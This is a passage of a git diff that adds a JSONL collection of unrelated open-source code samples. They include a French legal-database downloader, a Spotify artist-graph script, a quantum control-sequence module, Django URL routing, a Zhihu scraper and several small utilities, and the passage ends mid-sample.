diff --git "a/4101.jsonl" "b/4101.jsonl" new file mode 100644--- /dev/null +++ "b/4101.jsonl" @@ -0,0 +1,635 @@ +{"seq_id":"631762118","text":"# -*- coding: utf-8 -*-\n# \n# Archéo Lex – Pure Histoire de la Loi française\n# – crée un dépôt Git des lois françaises écrites en syntaxe Markdown\n# – ce module comprend diverses fonctions utilitaires\n# \n# This program is free software. It comes without any warranty, to\n# the extent permitted by applicable law. You can redistribute it\n# and/or modify it under the terms of the Do What The Fuck You Want\n# To Public License, Version 2, as published by Sam Hocevar. See\n# the LICENSE file for more details.\n\n# Imports\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport re\nimport subprocess\nimport datetime\nimport ftplib\nimport string\nfrom path import path\n\nMOIS = {\n 'janvier': '01',\n 'février': '02',\n 'mars': '03',\n 'avril': '04',\n 'mai': '05',\n 'juin': '06',\n 'juillet': '07',\n 'août': '08',\n 'septembre': '09',\n 'octobre': '10',\n 'novembre': '11',\n 'décembre': '12'\n}\n\n\nMOIS2 = ['', 'janvier', 'février', 'mars', 'avril', 'mai', 'juin', 'juillet', 'août', 'septembre', 'octobre', 'novembre', 'décembre']\n\n\ndef telecharger(url, fichier):\n \n subprocess.call(['wget', '--output-document=' + fichier, url])\n\n\ndef telecharger_cache(url, fichier, force=False):\n \n if os.path.exists(fichier):\n touch = datetime.datetime.fromtimestamp(os.stat(fichier).st_mtime)\n delta = datetime.datetime.today() - touch\n \n if not force or not isinstance(force, bool) and isinstance(force, (int, long, float)) and delta.total_seconds() < force:\n print('* Téléchargement de ' + url + ' (cache)')\n return True\n \n print('* Téléchargement de ' + url)\n return telecharger(url, fichier)\n\n\ndef normalisation_code(code):\n \n nom = ''\n repertoire = ''\n \n if code.startswith('code') or code.startswith('Code'):\n code = re.sub('\\'', '’', code.lower())\n nom = re.sub('[-_]', ' ', code)\n nom = nom[0].upper() + nom[1:]\n repertoire = re.sub('[ _]', '-', code)\n else:\n nom = code.lower()\n repertoire = code.lower()\n \n return repertoire, nom\n\n\ndef normalise_date(texte):\n \n texte = texte.strip()\n if texte == '2999-01-01' or not texte:\n return None\n fm = re.match('(\\d{4})-(\\d{2})-(\\d{2})', texte)\n if not fm:\n return None\n return datetime.date(int(fm.group(1)), int(fm.group(2)), int(fm.group(3)))\n\n\ndef chemin_texte(cidTexte, code=True, vigueur=True):\n \n if vigueur:\n vigueur = 'en'\n else:\n vigueur = 'non'\n \n if code:\n code = 'code'\n else:\n code = 'TNC'\n \n return os.path.join('legi', 'global', 'code_et_TNC_' + vigueur + '_vigueur', code + '_' + vigueur + '_vigueur', decompose_cid(cidTexte))\n\n\ndef decompose_cid(cidTexte):\n \n FFFF = cidTexte[0:4]\n TTTT = cidTexte[4:8]\n xx1 = cidTexte[8:10]\n xx2 = cidTexte[10:12]\n xx3 = cidTexte[12:14]\n xx4 = cidTexte[14:16]\n xx5 = cidTexte[16:18]\n \n return os.path.join(FFFF, TTTT, xx1, xx2, xx3, xx4, xx5, cidTexte)\n\n\ndef comp_infini(x, y):\n \n if x == y:\n return 0\n if x == None:\n return 1\n if y == None:\n return -1\n return -2 * int(x < y) + 1\n\n\ndef comp_infini_strict(x, y):\n \n if x == None and y == None:\n return False\n if x == None:\n return False\n if y == None:\n return True\n return x < y\n\n\ndef comp_infini_large(x, y):\n \n if x == y:\n return True\n if x == None:\n return False\n if y == None:\n return True\n return x < y\n\n\ndef nop():\n 
\n return\n\n\ndef verif_taille(taille, destination):\n \n s = os.statvfs(destination)\n \n if 1.05 * taille >= s.f_bavail * s.f_frsize: # en octets\n return False\n else:\n return True\n\n\n# Téléchargement des bases juridiques\n# \n# @param str identifiant 'JORF', 'LEGI', 'KALI', 'CNIL', 'CONSTIT', 'CIRCULAIRES'\n# @param str/int/None date_maj None pour télécharger toute la base\n# Pour la plus récente mise à jour avant une certaine date, utiliser 'AAAAMMJJ[-HHMMSS]', par exemple '29990101' (clin d’œil)\n# Pour la dernière, avant-dernière, etc. mise à jour, utiliser '0', '-1', etc. (ou 0, -1, etc.)\n# @param str cache\n# \n# Voici des exemples d’URLs :\n# - ftp://jorf:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_jorf_jorf_global_20140718-104554.tar.gz\n# - ftp://legi:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_legi_legi_global_20140718-113010.tar.gz\n# - ftp://kali:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_kali_kali__20140718-142314.tar.gz\n# - ftp://cnil:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_CNIL_cnil_global_20140718-104251.tar.gz\n# - ftp://constit:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_CONSTIT_constit_global_20140718-104144.tar.gz\n# - ftp://anonymous:@echanges.dila.gouv.fr:6370/CIRCULAIRES/ (non-testé, très probablement non-fonctionnel)\n# Voir http://rip.journal-officiel.gouv.fr/index.php/pages/juridiques\ndef telecharger_base(identifiant, date_maj, cache):\n \n identifiant = identifiant.upper()\n if identifiant not in ['JORF', 'LEGI', 'KALI', 'CNIL', 'CONSTIT']:\n raise Exception()\n if isinstance(date_maj, int):\n date_maj = str(date_maj)\n elif not isinstance(date_maj, str) and not date_maj == None:\n raise Exception()\n path(os.path.join(cache, 'tar')).mkdir_p()\n \n serveur = {\n 'JORF': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'jorf', 'open1234'),\n 'LEGI': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'legi', 'open1234'),\n 'KALI': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'kali', 'open1234'),\n 'CNIL': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'cnil', 'open1234'),\n 'CONSTIT': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'constit', 'open1234'),\n 'CIRCULAIRES': ('ftp', 'echanges.dila.gouv.fr:6370/CIRCULAIRES/', 'anonymous', ''),\n }\n fichier_base = {\n 'JORF': 'LicenceFreemium_jorf_jorf_global_%Y%m%d-%H%M%S.tar.gz',\n 'LEGI': 'LicenceFreemium_legi_legi_global_%Y%m%d-%H%M%S.tar.gz',\n 'KALI': 'LicenceFreemium_kali_kali__%Y%m%d-%H%M%S.tar.gz',\n 'CNIL': 'LicenceFreemium_CNIL_cnil_global_%Y%m%d-%H%M%S.tar.gz',\n 'CONSTIT': 'LicenceFreemium_CONSTIT_constit_global_%Y%m%d-%H%M%S.tar.gz',\n 'CIRCULAIRES': ''\n }\n fichier_majo = {\n 'JORF': 'jorf_%Y%m%d-%H%M%S.tar.gz',\n 'LEGI': 'legi_%Y%m%d-%H%M%S.tar.gz',\n 'KALI': 'kali_%Y%m%d-%H%M%S.tar.gz',\n 'CNIL': 'cnil_%Y%m%d-%H%M%S.tar.gz',\n 'CONSTIT': 'constit_%Y%m%d-%H%M%S.tar.gz',\n 'CIRCULAIRES': ''\n }\n \n # Connexion FTP\n connexion_ftp = ftplib.FTP(serveur[identifiant][1], serveur[identifiant][2], serveur[identifiant][3])\n liste_fichiers = connexion_ftp.nlst()\n \n # Recherche du fichier le plus récent et toutefois antérieure à la date demandée\n if date_maj == None:\n prefixe = string.split(fichier_base[identifiant], '%')[0]\n type_fichier = 'base'\n else:\n prefixe = string.split(fichier_majo[identifiant], '%')[0]\n type_fichier = 'majo'\n dates = []\n for fichier in liste_fichiers:\n if fichier.startswith(prefixe):\n dates.append(re.sub(prefixe + '([0-9-]+)\\.tar\\.gz', r'\\1', fichier))\n dates.sort(None, None, True)\n date_selectionnee = 0\n if date_maj:\n if 
len(date_maj) == 8:\n date_maj = date_maj + '-235959'\n if re.match('^(0|-\\d+)$', date_maj):\n date_selectionnee = -int(date_maj)\n else:\n while date_selectionnee < len(dates) and dates[date_selectionnee] > date_maj:\n date_selectionnee = date_selectionnee + 1\n if date_selectionnee == len(dates):\n raise Exception()\n recent = dates[date_selectionnee]\n \n # Création de l’URL\n url = serveur[identifiant][0] + '://' + serveur[identifiant][2] + ':' + serveur[identifiant][3] + '@' + serveur[identifiant][1] + '/' + prefixe + recent + '.tar.gz'\n \n # Vérification de la taille disponible\n if not verif_taille(connexion_ftp.size(prefixe + recent + '.tar.gz'), cache) and not os.path.exists(identifiant + '-' + type_fichier + '-' + recent + '.tar.gz'):\n raise Exception()\n connexion_ftp.close()\n \n # Téléchargement de la base demandée\n return telecharger_cache(url, os.path.join(cache, 'tar', identifiant + '-' + type_fichier + '-' + recent + '.tar.gz'))\n\n","sub_path":"marcheolex/utilitaires.py","file_name":"utilitaires.py","file_ext":"py","file_size_in_byte":8605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"391071591","text":"\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nfrom pprint import pprint\r\nfrom config import spotify\r\nfrom tqdm import tqdm\r\n\r\ndef find_artists(name):\r\n \"\"\" 最初の探索 \"\"\"\r\n artist_df = pd.DataFrame(columns=['artist_name', 'artist_ID', 'genres', 'popularity', 'related_artist_names'])\r\n spotapi_out = spotify.search(q='artist:' + name, type='artist')\r\n artist_items = spotapi_out['artists']['items'][0]\r\n artist_id = artist_items['id']\r\n artid_list = [artist_id]\r\n atrname_related_list = []\r\n spotapi_out_related = spotify.artist_related_artists(artist_id)\r\n for artname_related in spotapi_out_related['artists']:\r\n atrname_related_list.append(artname_related['name'])\r\n sr = pd.Series([artist_items['name'], artist_items['id'], artist_items['genres'], artist_items['popularity'], atrname_related_list], index=artist_df.columns)\r\n artist_df = artist_df.append(sr, ignore_index=True)\r\n return artid_list, artist_df\r\n\r\ndef find_related_artists(depth):\r\n \"\"\" depth分類似するアーティストを探索する \"\"\"\r\n # 名前は英語名でないと正常に返ってこないので注意\r\n artid_list, artist_df = find_artists('Sumire Uesaka')\r\n artid_list_tail = 0\r\n for i in range(depth):\r\n artid_list_head = artid_list_tail\r\n artid_list_tail = len(artid_list)\r\n for artid in tqdm(artid_list[artid_list_head:artid_list_tail]):\r\n spotapi_out = spotify.artist_related_artists(artid)\r\n for artid_related in spotapi_out['artists']:\r\n # 類似のアーティストリストを作成\r\n artname_related2_list = []\r\n spotapi_out_related = spotify.artist_related_artists(artid_related['id'])\r\n for artname_related2 in spotapi_out_related['artists']:\r\n artname_related2_list.append(artname_related2['name'])\r\n artid_list.append(artid_related['id'])\r\n sr = pd.Series([artid_related['name'], artid_related['id'], artid_related['genres'], \r\n artid_related['popularity'], artname_related2_list], index=artist_df.columns)\r\n artist_df = artist_df.append(sr ,ignore_index=True)\r\n return artid_list, artist_df\r\n\r\nartid_list, artist_df = find_related_artists(1)\r\n\r\nprint(artist_df)\r\n\r\n\r\n# アーティストの関係辞書を作る\r\nartdic = {}\r\nfor i in range(len(artid_list)):\r\n artdic[artist_df.iloc[i,0]] = []\r\n for artname_related in artist_df.iloc[i,4]:\r\n artdic[artist_df.iloc[i,0]].append(artname_related)\r\n\r\nprint(artdic)\r\n\r\n# 
nodeとedgeの設定\r\nG = nx.Graph()\r\nG.add_nodes_from(list(artdic.keys()))\r\nfor parent in artdic.keys():\r\n relation = [(parent, child) for child in artdic[parent]]\r\n G.add_edges_from(relation)\r\n\r\n# sizeとcolorの設定\r\naverage_deg = sum(d for n, d in G.degree()) / G.number_of_nodes()\r\nsizes = [1000*d/average_deg for n, d in G.degree()]\r\ncolors = [i/len(G.nodes) for i in range(len(G.nodes))]\r\n\r\n# 探索する次数によってfigsizeを変更\r\nplt.figure(figsize=(50,50))\r\nnx.draw(G, font_family='Yu Gothic', with_labels=True, node_size=sizes, node_color=colors)\r\nplt.savefig('depth2.png')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"api/spotify/spotify_api.py","file_name":"spotify_api.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"412526844","text":"# -*- coding: utf-8 -*-\nr\"\"\"\nControl sequences (:mod:`qit.seq`)\n==================================\n\n\nPiecewise constant control sequences for quantum systems.\nEach control sequence is a dictionary with the following keys:\n\n======= ===============================================================================================\nA Drift generator (typically :math:`i/\\hbar` times a Hamiltonian and a time unit of your choice).\nB List of control generators. c := len(B).\ntau Vector of durations of the time slices. m := len(tau).\ncontrol Array, shape (m, c). control[i,j] is the value of control field j during time slice i.\n======= ===============================================================================================\n\nThe total generator for the time slice j is thus given by\n\n.. math::\n\n G_j = A +\\sum_k \\text{control}_{jk} B_k,\n\nand the corresponding propagator is\n\n.. math::\n\n P_j = \\exp(-\\tau_j G_j).\n\n\nNOTE the unusual sign convention.\n\n\n.. currentmodule:: qit.seq\n\nContents\n--------\n\n.. autosummary::\n\n nmr\n corpse\n bb1\n scrofulous\n cpmg\n seq2prop\n propagate\n\"\"\"\n# Ville Bergholm 2011-2014\n\nfrom __future__ import division, absolute_import, print_function, unicode_literals\n\nfrom numpy import array, sin, cos, arcsin, arccos, pi, asarray, eye, zeros, r_, c_, dot, nonzero, ceil, linspace\nfrom scipy.linalg import expm\nfrom scipy.optimize import brentq\n\nfrom .base import sx, sy, tol\n\n\n__all__ = ['nmr', 'bb1', 'corpse', 'cpmg', 'scrofulous', 'seq2prop', 'propagate']\n\n\ndef nmr(a):\n r\"\"\"Convert NMR-style rotations into a one-qubit control sequence.\n\n Returns a one-qubit control sequence corresponding to the array a:\n\n .. math::\n\n a = [[\\theta_1, \\phi_1], [\\theta_2, \\phi_2], ...]\n\n Each :math:`\\theta, \\phi` pair corresponds to a NMR rotation\n of the form :math:`\\theta_\\phi`,\n or a rotation of the angle :math:`\\theta`\n about the unit vector :math:`[\\cos(\\phi), \\sin(\\phi), 0]`.\n\n .. 
math::\n\n R_{\\vec{a}}(\\theta) = \\exp(-i \\vec{a} \\cdot \\vec{\\sigma} \\theta/2) = \\exp(-i H t) \\quad \\Leftarrow \\quad\n H = \\vec{a} \\cdot \\vec{\\sigma}/2, \\quad t = \\theta.\n \"\"\"\n # Ville Bergholm 2006-2009\n\n a = asarray(a, dtype=float)\n theta = a[:, 0]\n phi = a[:, 1]\n\n # find theta angles that are negative, convert them to corresponding positive rotations\n rows = nonzero(theta < 0)[0]\n theta[rows] = -theta[rows]\n phi[rows] = phi[rows] + pi\n\n # construct the sequence TODO make it a class?\n # NOTE the strange sign convention in A and B\n s = {'A': zeros((2, 2)),\n 'B': [0.5j * sx, 0.5j * sy],\n 'tau': theta,\n 'control': c_[cos(phi), sin(phi)]\n }\n return s \n\n\ndef bb1(theta, phi=0, location=0.5):\n r\"\"\"Sequence for correcting pulse length errors.\n\n Returns the Broadband number 1 control sequence for correcting\n proportional errors in pulse length (or amplitude) :cite:`Wimperis`.\n\n The target rotation is :math:`\\theta_\\phi` in the NMR notation.\n \"\"\"\n # Ville Bergholm 2009-2012\n\n ph1 = arccos(-theta / (4*pi))\n W1 = [[pi, ph1], [2*pi, 3*ph1], [pi, ph1]]\n return nmr([[location * theta, phi]] + W1 + [[(1-location) * theta, phi]])\n\n\ndef corpse(theta, phi=0):\n r\"\"\"Sequence for correcting off-resonance errors.\n\n Returns the CORPSE control sequence for correcting off-resonance\n errors, i.e. ones arising from a constant but unknown\n :math:`\\sigma_z` bias in the Hamiltonian :cite:`Cummins`\n\n The target rotation is :math:`\\theta_\\phi` in the NMR notation.\n\n CORPSE: Compensation for Off-Resonance with a Pulse SEquence\n \"\"\"\n # Ville Bergholm 2009\n\n n = [1, 1, 0] # CORPSE\n #n = [0, 1, 0] # short CORPSE\n\n temp = arcsin(sin(theta / 2) / 2)\n\n th1 = 2*pi*n[0] +theta/2 -temp\n th2 = 2*pi*n[1] -2*temp\n th3 = 2*pi*n[2] +theta/2 -temp\n return nmr([[th1, phi], [th2, phi+pi], [th3, phi]])\n\n\ndef cpmg(t, n):\n r\"\"\"Carr-Purcell-Meiboom-Gill sequence.\n\n Returns the Carr-Purcell-Meiboom-Gill sequence of n repeats with waiting time t.\n The purpose of the CPMG sequence is to facilitate a T_2 measurement\n under a nonuniform z drift, it is not meant to be a full memory protocol.\n The target operation for this sequence is identity.\n \"\"\"\n # Ville Bergholm 2007-2012\n\n s = nmr([[pi/2, pi/2]]) # initial y rotation\n\n # step: wait, pi x rotation, wait\n step_tau = array([t, pi, t])\n step_ctrl = array([[0, 0], [1, 0], [0, 0]])\n for k in range(n):\n s['tau'] = r_[s['tau'], step_tau]\n s['control'] = r_[s['control'], step_ctrl]\n return s\n\n\ndef scrofulous(theta, phi=0):\n r\"\"\"Sequence for correcting pulse length errors.\n\n Returns the SCROFULOUS control sequence for correcting errors\n in pulse duration (or amplitude) :cite:`Cummins`.\n\n The target rotation is :math:`\\theta_\\phi` in the NMR notation.\n\n SCROFULOUS: Short Composite ROtation For Undoing Length Over- and UnderShoot\n \"\"\"\n # Ville Bergholm 2006-2014\n\n th1 = brentq(lambda t: (sin(t)/t -(2 / pi) * cos(theta / 2)), 0.1, 4.6)\n ph1 = arccos(-pi * cos(th1) / (2 * th1 * sin(theta / 2)))\n ph2 = ph1 - arccos(-pi / (2 * th1))\n\n u1 = [[th1, ph1 +phi]]\n u2 = [[pi, ph2 +phi]]\n return nmr(u1 + u2 + u1)\n\n\ndef seq2prop(s):\n r\"\"\"Propagator corresponding to a control sequence.\n\n Returns the propagator matrix corresponding to the\n action of the control sequence s.\n\n Governing equation: :math:`\\dot(X)(t) = -(A +\\sum_k u_k(t) B_k) X(t) = -G(t) X(t)`.\n \"\"\"\n # Ville Bergholm 2009-2012\n\n A = s['A']\n B = s['B']\n\n n = len(s['tau'])\n P = 
eye(A.shape[0])\n for j in range(n):\n G = A\n for k, b in enumerate(B):\n G = G + s['control'][j, k] * b\n\n temp = expm(-s['tau'][j] * G) # NOTE the sign convention here\n P = dot(temp, P)\n\n return P\n\n\ndef propagate(s, seq, out_func=lambda x: x, base_dt=0.1):\n \"\"\"Propagate a state in time using a control sequence.\n \n If no output function is given, we use an identity map.\n \"\"\"\n # Ville Bergholm 2009-2014\n\n A = seq['A']\n B = seq['B']\n\n n = len(seq['tau'])\n t = [0] # initial time\n out = [out_func(s)] # initial state\n\n # loop over the sequence\n for j in range(n):\n G = A\n for k, b in enumerate(B):\n G = G + seq['control'][j, k] * b\n\n T = seq['tau'][j] # pulse duration\n n_steps = max(int(ceil(T / base_dt)), 1)\n dt = T / n_steps\n\n P = expm(-G * dt) # NOTE TODO the sign convention here\n for k in range(n_steps):\n s = s.u_propagate(P)\n out.append(out_func(s))\n\n temp = t[-1]\n t.extend(list(linspace(temp+dt, temp+T, n_steps)))\n return out, t\n","sub_path":"qit/seq.py","file_name":"seq.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551059847","text":"\n\nfrom xai.brain.wordbase.verbs._hurl import _HURL\n\n#calss header\nclass _HURLED(_HURL, ):\n\tdef __init__(self,): \n\t\t_HURL.__init__(self)\n\t\tself.name = \"HURLED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"hurl\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_hurled.py","file_name":"_hurled.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"523824535","text":"\"\"\"ask_gulyachenkov URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom question import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('question/', views.index_html, name=\"test\"),\n path('question/', views.one_question, name=\"one_question_url\"),\n path('', views.index_html, name=\"index\"),\n path('login/', views.login_html, name=\"login_url\"),\n path('register/', views.register_html, name=\"register_url\"),\n path('add_question/', views.add_question_html, name=\"add_question_url\"),\n path('question_by_tag/', views.questions_by_tag_html, name=\"question_by_tag_url\"),\n path('hot_questions/', views.hot_questions_html, name=\"hot_questions_url\"),\n path('logout/', views.log_out, name=\"logout_url\"),\n path('profile/edit', views.profile_edit, name=\"profile_edit_url\"),\n path('vote/', views.vote, name=\"vote_url\"),\n path('checkbox/', views.checkbox, name=\"checkbox_url\"),\n\n]\n","sub_path":"ask_gulyachenkov/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"528550720","text":"#!/bin/bash\n#coding:utf8\nimport re;\nimport urllib;\nimport datetime;\nimport MySQLdb;\n\nreg=r''; #正则表达式\nquesre=re.compile(reg);\n\ndef getHtml(url):\n\tpage=urllib.urlopen(url);\n\t#urllib.urlretrieve('https://www.zhihu.com/','a.html');\n\thtml=page.read();\n\treturn html;\n\ndef getImg(html):\n\tquesList=re.findall(quesre,html);\n\tli=[];\n\tfor ques in quesList:\n\t\tupdate_time=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S');\n\t\tli.append(('https://www.zhihu.com'+ques,update_time));\n\treturn li;\n\n\nconn=MySQLdb.Connect(host='localhost',port=3306,user='root',passwd='123456',db='test',charset='utf8')\nhtml=getHtml('https://www.zhihu.com/');\n#print html;\nli=getImg(html);\n#print li;\nsql = \"insert into question (url,update_time) values(%s,%s)\";\ncur=conn.cursor();\ncur.executemany(sql,li);\nconn.commit();\ncur.execute(\"drop table if exists `tmp`\");\ncur.execute(\"create table tmp as select min(id) as id from question group by url\");\ncur.execute(\"delete from question where id not in (select id from tmp)\");\nconn.commit();\nconn.cursor().close();\nconn.close();\n","sub_path":"getzhihuquestion.py","file_name":"getzhihuquestion.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"384365374","text":"'''\nCopyright 2013 Paul Sidnell\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\n\nfrom fmt_template import Formatter\n\ndef escape (val):\n return val.replace('\"','"').replace('&','&').replace('<','<').replace('>','>')\n\ndef format_note (lines):\n return ' '.join([escape (line) for line in lines])\n \nclass PrintOpmlVisitor(Formatter):\n def __init__ (self, out, template):\n attrib_conversions = {\n 'id' : lambda x: escape(x),\n 'name' : lambda x: escape(x),\n 'link' : lambda x: x,\n 'status' : 
lambda x: x,\n 'flagged' : lambda x: str(x) if x else None,\n 'context' : lambda x: escape(''.join (x.name.split ())),\n 'project' : lambda x: escape(''.join (x.name.split ())),\n 'date_to_start' : lambda x: x.strftime(template.date_format),\n 'date_due' : lambda x: x.strftime(template.date_format),\n 'date_completed' : lambda x: x.strftime(template.date_format),\n 'note' : lambda x: format_note (x.get_note_lines ())\n }\n Formatter.__init__(self, out, template, attrib_conversions = attrib_conversions)","sub_path":"bin/ofexport-master/src/main/python/of_to_opml.py","file_name":"of_to_opml.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"533041142","text":"# -*- encoding: utf-8 -*-\nfrom guillotina import configure\nfrom guillotina.content import Folder\nfrom guillotina.interfaces import IFolder\nfrom guillotina_cms.fields.richtext import RichTextField\nfrom guillotina_cms import _\nfrom guillotina.directives import index\n\n\nclass IDocument(IFolder):\n\n index('text', type='text')\n text = RichTextField(\n title=_('Text'),\n required=False,\n widget='richtext')\n\n\n@configure.contenttype(\n type_name='Document',\n schema=IDocument,\n behaviors=['guillotina.behaviors.dublincore.IDublinCore'],\n allowed_types=[] # dynamically calculated\n)\nclass Document(Folder):\n pass\n","sub_path":"guillotina_cms/content/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"643787134","text":"class Solution(object):\n\n def strobogrammaticInRange(self, low, high):\n \"\"\"\n :type low: str\n :type high: str\n :rtype: int\n \"\"\"\n if len(high) < len(low) or (len(high) == len(low) and high < low):\n return 0\n result = 0\n for i in xrange(len(low), len(high) + 1):\n result += self.count(i)\n low_set = self.dfs(len(low), len(low))\n high_set = self.dfs(len(high), len(high)) if len(\n low) != len(high) else low_set\n for s in low_set:\n if s < low:\n result -= 1\n for s in high_set:\n if s > high:\n result -= 1\n return result\n\n def count(self, n):\n if n == 0:\n return 0\n if n == 1:\n return 3\n if n % 2 == 0:\n return 4 * (5 ** (n / 2 - 1))\n return 3 * 4 * (5 ** (n / 2 - 1))\n\n def dfs(self, n, max_val):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n if n == 0:\n return ['']\n if n == 1:\n return ['1', '8', '0']\n result = []\n r = self.dfs(n - 2, max_val)\n for s in r:\n if n != max_val:\n result.append('0' + s + '0')\n result.append('1' + s + '1')\n result.append('8' + s + '8')\n result.append('6' + s + '9')\n result.append('9' + s + '6')\n return result\n","sub_path":"leetcode_python/248_Strobogrammatic_Number_III.py","file_name":"248_Strobogrammatic_Number_III.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"386518971","text":"from character import *\nfrom geometry import *\nfrom general import *\n\nclass Player:\n def __init__(self, system, client):\n self.system = system\n client.system = system\n\n system.players_locker.acquire()\n self.id = system.next_player\n system.next_player = system.next_player + 1\n system.players[self.id] = self\n system.players_locker.release()\n \n self.client = client\n client.player = self\n\n self.perspective = {}\n\n def create_role(self):\n self.role = Character(self.system, self, \"characters/champions/hardfake/init.py\")\n 
\n def on_remove(self):\n self.system.players_locker.acquire()\n del self.system.players[self.id]\n self.system.players_locker.release()\n\n self.system.event_handler.event_remove(self.role)\n\n def pack_data(self, statement):\n new_perspective = pack_check_dic(self.perspective, statement)\n if not new_perspective:\n new_perspective = {}\n\n temp = self.perspective.copy()\n for id in temp:\n if not id in statement:\n new_perspective[id] = \"r\"\n del self.perspective[id]\n return new_perspective","sub_path":"game_project/server/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"34469711","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport scipy\nimport warnings\n\nfrom onecodex.exceptions import OneCodexException\nfrom onecodex.helpers import normalize_classifications\nfrom onecodex.distance import braycurtis, cityblock, jaccard, unifrac\n\n\ndef plot_distance(analyses, metric='braycurtis',\n title=None, label=None, xlabel=None, ylabel=None,\n field='readcount_w_children', rank='species', **kwargs):\n \"\"\"Plot beta diversity distance matrix.\n\n Additional **kwargs are passed to Seaborn's `sns.clustermap`.\n \"\"\"\n # if taxonomy trees are inconsistent, unifrac will not work\n if metric in ['braycurtis', 'bray-curtis', 'bray curtis']:\n f = braycurtis\n elif metric in ['manhattan', 'cityblock']:\n f = cityblock\n elif metric == 'jaccard':\n f = jaccard\n elif metric == 'unifrac':\n f = unifrac\n else:\n raise OneCodexException(\"'metric' must be one of \"\n \"braycurtis, manhattan, jaccard, or unifrac\")\n\n normed_classifications, metadata = normalize_classifications(analyses, label=label)\n if len(normed_classifications) < 2:\n raise OneCodexException('`plot_distance` requires 2 or more valid classification results.')\n\n sns.set(style=kwargs.pop('style', 'darkgrid'))\n\n # there is no uniqueness constraint on metadata names\n # so plot by uuid, then replace the labels in the dataframe with their names\n uuids = {}\n sample_names = {}\n for idx, analysis in enumerate(normed_classifications):\n uuids[analysis.id] = analysis.id\n sample_names[analysis.id] = metadata.loc[idx, '_display_name']\n\n distances = f(normed_classifications, field=field, rank=rank)\n ids = distances.ids\n distance_matrix = distances.data\n dists = {}\n for idx1, id1 in enumerate(ids):\n dists[uuids[id1]] = {}\n for idx2, id2 in enumerate(ids):\n dists[uuids[id1]][uuids[id2]] = distance_matrix[idx1][idx2]\n dists = pd.DataFrame(dists).rename(index=sample_names, columns=sample_names)\n\n # Plot cluster map; ignore new SciPy cluster warnings\n with warnings.catch_warnings():\n warnings.simplefilter('ignore', scipy.cluster.hierarchy.ClusterWarning)\n g = sns.clustermap(dists, **kwargs)\n\n plt.setp(g.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)\n\n # Labels\n if xlabel is not None:\n plt.gca().set_xlabel(xlabel)\n if ylabel is not None:\n plt.gca().set_ylabel(ylabel)\n\n if title:\n g.fig.suptitle(title)\n plt.show()\n","sub_path":"onecodex/viz/_distance.py","file_name":"_distance.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"514669816","text":"# -*- coding: utf-8 -*-\r\n##############################################################################\r\n#\r\n# OpenERP, Open Source Management Solution\r\n# Copyright (C) 2004-2010 Tiny SPRL 
